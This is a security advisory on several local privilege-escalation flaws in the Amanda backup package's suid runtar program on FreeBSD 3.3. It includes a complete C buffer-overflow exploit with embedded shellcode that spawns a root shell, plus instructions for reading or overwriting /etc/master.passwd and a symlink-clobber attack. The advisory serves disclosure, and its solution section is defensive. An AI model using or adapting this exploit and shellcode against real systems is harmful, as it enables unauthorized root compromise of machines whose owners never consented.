COMMAND

    Amanda

SYSTEMS AFFECTED

    multiple platforms... (FreeBSD, BSDi, etc)

PROBLEM

    Brock Tellier found  following.  The  Amanda backup package  has a
    several vulnerabilities  which will  allow any  user to  gain root
    privs.   Brock's  tests  were  done  ONLY  on FreeBSD 3.3-RELEASE,
    though this  is almost  certainly not  the only  vulnerable OS.  A
    search  for  "amanda-2  and  not  freebsd"  on  altavista   yields
    preliminary, unconfirmed  data that  some of  the vulnerable  OS's
    (based on packages that are  included on install CD's, anyone  can
    install  Amanda  to  make  themselves  vulnerable) may be:  RedHat
    ?.?, TurboLinux,  PowerTools CD,  SuSE 6.2  Confirmation on  which
    OS's/tar's are vulnerable would be useful.

    Amanda's "runtar" program,  suid root by  default on FreeBSD  3.3,
    calls /usr/bin/tar  and passes  all args  given to  runtar to this
    program. Tar is thus run  with root permissions and is  vulnerable
    to all of the same attacks on suid programs that it would have  if
    it were suid itself.

    Vuln #1 - run tar as root
    =========================
    Since tar is run with root permissions, you are free to tar up any
    file you wish, including  /etc/master.passwd.  You may  also untar
    any  file  you  wish,  to  any  location  on the system, including
    /etc/master.passwd.   This does  not require  any exploit  kung-fu
    and may be  done by supplying  args to tar/runtar  as if you  were
    root.

    Vuln #1.1 - tar contains a buffer overflow
    ==========================================
    Obtaining root via buffer  overflow here is redundant,  of course,
    but  it  illustrates  the  point  that  even if tar's capabilities
    weren't able to gain root  privs, the buffer overflow would  still
    allow you to do so.  An overflow exists *IN TAR* which will  allow
    any user to execute  commands as root.   Note that an overflow  in
    tar isn't an immediate security flaw since it is never  suid/sgid,
    but it goes to show that one should do security audits of all  the
    programs one calls with user input.   By passing a long string  to
    runtar in the form

        /usr/local/libexec/amanda/runtar cvf $400bytes:bah

    we can execute our commands.  FreeBSD exploit attached below.

    Vuln #2 - symlink problem
    ==========================
    Not quite as serious, but a concern nonetheless.  When the amandad
    daemon is run,  a bin-owned file  called "amandad.debug" in  /tmp.
    By creating a symlink  from /tmp/amandad.debug to any  other file,
    we  will  force  amandad  to  clobber  the  contents  with that of
    amandad's debug info.  Note that amandad is not suid/sgid, but  it
    is often run with root perms at startup or via scripts.

    Vulnerable is anyone  running a suid  version of runtar  should be
    suspicious.  Brock did not tested any other O.S.'s except  FreeBSD
    3.3,  which  includes  amanda  2.3.0  and  2.4.1  as   "additional
    packages" on the install CD and tar-1.11.2.

    Exploit:

    /*
     * Amanda runtar exploit yields euid=0(root)
     * Actually overflows tar 1.11.2 (included in FreeBSD 3.3)
     * Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other
     * platforms
     *
     * Compile gcc -o amandax amandax.c
     * Run ./amandax <offset> <buflen>
     * keep buflen around 400, try positive and negative offsets
     *
     * Brock Tellier btellier@usa.net
     */


    #include <stdlib.h>
    #include <stdio.h>

    char fbsdshell[]= /* mudge@lopht.com */
      "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
       "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
       "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
       "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";


    #define LEN 400
    #define NOP 0x90
    #define ALIGN 3
    #define OFFSET 0
    #define ADDR 0xbfbfdd90 /* fbsd 3.3 */

    int main(int argc, char *argv[]) {

    long int offset=OFFSET;

    int i;
    int buflen = LEN;
    long int addr = ADDR;
    char buf[LEN];

    if (argc > 1) offset = atoi(argv[1]);
    if (argc > 2) buflen = atoi(argv[2]);
    if (argc > 3) {
      fprintf(stderr, "Usage: %s <offset> <buflen>");
      exit(0);
    }

    fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n");
    fprintf(stderr, "Brock Tellier btellier@usa.net\n");
    fprintf(stderr, "Using addr: 0x%x\t buflen: %d\t offset: %d\n",
    addr+offset, buflen, offset);

    memset(buf,NOP,buflen);
    memcpy(buf+100,fbsdshell,strlen(fbsdshell));
    for(i= 100 + strlen(fbsdshell)+ALIGN;i<buflen-4;i+=4)*(int
    *)&buf[i]=addr+offset;

    execl("/usr/local/libexec/amanda/runtar", "runtar","cvf", buf, ":bah",
    NULL);

    exit(0);
    }

SOLUTION

    If your amanda is properly installed, then it is as a user amanda,
    bin,  or  operator,  none  of  which  should  be accessible from a
    regular user.   If this account  is compromised, then  security is
    irrelevant because  amanda need  to be  able to  read the raw disk
    files (to do  backups) and thus  would be able  to get /etc/shadow
    (or the local equivalent) without much work.

    Amanda  has  undergone  a  major  security auditing before release
    2.4.0 final  (the latest  stable release  is 2.4.1p1),  in which a
    couple  of  security  problems  have  been  fixed,  and  a  lot of
    security  problem-prone  constructs  have  been  reworked to avoid
    buffer overflows and such.